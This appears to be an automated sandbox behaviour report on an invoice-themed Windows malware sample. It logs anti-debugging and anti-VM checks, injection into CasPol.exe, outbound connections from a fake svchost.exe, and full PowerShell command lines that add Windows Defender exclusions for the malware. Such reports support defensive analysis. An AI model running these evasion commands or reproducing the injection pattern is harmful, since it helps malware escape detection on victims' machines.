        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
        Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exeCode function: 17_2_0066FB3C sldt word ptr [eax]
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5198
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2028
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2253
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1277
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWindow / User API: threadDelayed 3540
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWindow / User API: threadDelayed 6048
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWindow / User API: foregroundWindowGot 503
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5976Thread sleep time: -4611686018427385s >= -30000s
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6644Thread sleep time: -11990383647911201s >= -30000s
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6644Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 4388Thread sleep time: -12912720851596678s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 4476Thread sleep time: -300000s >= -30000s
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: powershell.exe, 00000005.00000003.889239741.0000000004A60000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000002.954752445.0000000005098000.00000004.00000001.sdmpBinary or memory string: k:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
        Source: powershell.exe, 00000005.00000003.889239741.0000000004A60000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000002.954752445.0000000005098000.00000004.00000001.sdmpBinary or memory string: Hyper-V
        Source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.965623964.0000000005690000.00000002.00000001.sdmp, svchost.exe, 00000004.00000002.684245324.000001C21E860000.00000002.00000001.sdmp, svchost.exe, 00000011.00000002.962422235.0000000005600000.00000002.00000001.sdmp, svchost.exe, 00000012.00000002.733728304.0000019378B40000.00000002.00000001.sdmp, svchost.exe, 00000015.00000002.739078066.00000184296C0000.00000002.00000001.sdmp, svchost.exe, 00000016.00000002.967813030.0000000005C30000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
        Source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.965623964.0000000005690000.00000002.00000001.sdmp, svchost.exe, 00000004.00000002.684245324.000001C21E860000.00000002.00000001.sdmp, svchost.exe, 00000011.00000002.962422235.0000000005600000.00000002.00000001.sdmp, svchost.exe, 00000012.00000002.733728304.0000019378B40000.00000002.00000001.sdmp, svchost.exe, 00000015.00000002.739078066.00000184296C0000.00000002.00000001.sdmp, svchost.exe, 00000016.00000002.967813030.0000000005C30000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
        Source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.965623964.0000000005690000.00000002.00000001.sdmp, svchost.exe, 00000004.00000002.684245324.000001C21E860000.00000002.00000001.sdmp, svchost.exe, 00000011.00000002.962422235.0000000005600000.00000002.00000001.sdmp, svchost.exe, 00000012.00000002.733728304.0000019378B40000.00000002.00000001.sdmp, svchost.exe, 00000015.00000002.739078066.00000184296C0000.00000002.00000001.sdmp, svchost.exe, 00000016.00000002.967813030.0000000005C30000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
        Source: AdvancedRun.exe, 00000007.00000002.691945955.0000000000669000.00000004.00000020.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
        Source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.899748414.00000000015BE000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
        Source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.965623964.0000000005690000.00000002.00000001.sdmp, svchost.exe, 00000004.00000002.684245324.000001C21E860000.00000002.00000001.sdmp, svchost.exe, 00000011.00000002.962422235.0000000005600000.00000002.00000001.sdmp, svchost.exe, 00000012.00000002.733728304.0000019378B40000.00000002.00000001.sdmp, svchost.exe, 00000015.00000002.739078066.00000184296C0000.00000002.00000001.sdmp, svchost.exe, 00000016.00000002.967813030.0000000005C30000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
        Source: explorer.exe, 00000014.00000002.919540301.0000000000E9D000.00000004.00000020.sdmpBinary or memory string: ECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&00
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeProcess information queried: ProcessInformation

        Anti Debugging:

        barindex
        Hides threads from debuggersShow sources
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeThread information set: HideFromDebugger
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeThread information set: HideFromDebugger
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeThread information set: HideFromDebugger
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeThread information set: HideFromDebugger
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeThread information set: HideFromDebugger
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeThread information set: HideFromDebugger
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeThread information set: HideFromDebugger
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeThread information set: HideFromDebugger
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeThread information set: HideFromDebugger
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeThread information set: HideFromDebugger
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeThread information set: HideFromDebugger
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeThread information set: HideFromDebugger
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeThread information set: HideFromDebugger
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeProcess queried: DebugPort
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeProcess queried: DebugPort
        Source: C:\Users\user\AppData\Local\Temp\1f3ffc2d-f33f-4afa-bc9d-6e94ff3bd17f\AdvancedRun.exeCode function: 7_2_0040289F LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeProcess token adjusted: Debug
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
        Source: C:\Users\user\AppData\Local\Temp\1f3ffc2d-f33f-4afa-bc9d-6e94ff3bd17f\AdvancedRun.exeProcess token adjusted: Debug
        Source: C:\Users\user\AppData\Local\Temp\1f3ffc2d-f33f-4afa-bc9d-6e94ff3bd17f\AdvancedRun.exeProcess token adjusted: Debug
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
        Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exeProcess token adjusted: Debug
        Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exeProcess token adjusted: Debug
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess token adjusted: Debug
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeMemory allocated: page read and write | page guard

        HIPS / PFW / Operating System Protection Evasion:

        barindex
        System process connects to network (likely due to code injection or exploit)Show sources
        Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exeNetwork Connect: 104.21.71.230 80
        Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exeNetwork Connect: 172.67.172.17 80
        Adds a directory exclusion to Windows DefenderShow sources
        Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe' -Force
        Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe' -Force
        Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe' -Force
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe' -Force
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe' -Force
        Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe' -Force
        Injects a PE file into a foreign processesShow sources
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000 value starts with: 4D5A
        Writes to foreign memory regionsShow sources
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 402000
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 420000
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 422000
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: C73008
        Source: C:\Users\user\AppData\Local\Temp\1f3ffc2d-f33f-4afa-bc9d-6e94ff3bd17f\AdvancedRun.exeCode function: 7_2_00401C26 GetCurrentProcessId,memset,memset,_snwprintf,memset,ShellExecuteExW,WaitForSingleObject,GetExitCodeProcess,GetLastError,
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe' -Force
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeProcess created: C:\Users\user\AppData\Local\Temp\1f3ffc2d-f33f-4afa-bc9d-6e94ff3bd17f\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\1f3ffc2d-f33f-4afa-bc9d-6e94ff3bd17f\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\1f3ffc2d-f33f-4afa-bc9d-6e94ff3bd17f\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe' -Force
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe
        Source: C:\Users\user\AppData\Local\Temp\1f3ffc2d-f33f-4afa-bc9d-6e94ff3bd17f\AdvancedRun.exeProcess created: C:\Users\user\AppData\Local\Temp\1f3ffc2d-f33f-4afa-bc9d-6e94ff3bd17f\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\1f3ffc2d-f33f-4afa-bc9d-6e94ff3bd17f\AdvancedRun.exe' /SpecialRun 4101d8 744
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 1
        Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe' -Force
        Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 6200 -ip 6200
        Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6200 -s 2152
        Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\1f3ffc2d-f33f-4afa-bc9d-6e94ff3bd17f\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\1f3ffc2d-f33f-4afa-bc9d-6e94ff3bd17f\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\1f3ffc2d-f33f-4afa-bc9d-6e94ff3bd17f\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeProcess created: C:\Users\user\AppData\Local\Temp\1f3ffc2d-f33f-4afa-bc9d-6e94ff3bd17f\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\1f3ffc2d-f33f-4afa-bc9d-6e94ff3bd17f\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\1f3ffc2d-f33f-4afa-bc9d-6e94ff3bd17f\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
        Source: explorer.exe, 0000000B.00000002.938982437.0000000000BE0000.00000002.00000001.sdmp, explorer.exe, 00000014.00000002.919876518.00000000014D0000.00000002.00000001.sdmpBinary or memory string: Program Manager
        Source: explorer.exe, 0000000B.00000002.938982437.0000000000BE0000.00000002.00000001.sdmp, explorer.exe, 00000014.00000002.919876518.00000000014D0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
        Source: explorer.exe, 0000000B.00000002.938982437.0000000000BE0000.00000002.00000001.sdmp, explorer.exe, 00000014.00000002.919876518.00000000014D0000.00000002.00000001.sdmpBinary or memory string: Progman
        Source: explorer.exe, 0000000B.00000002.938982437.0000000000BE0000.00000002.00000001.sdmp, explorer.exe, 00000014.00000002.919876518.00000000014D0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeQueries volume information: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe VolumeInformation
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
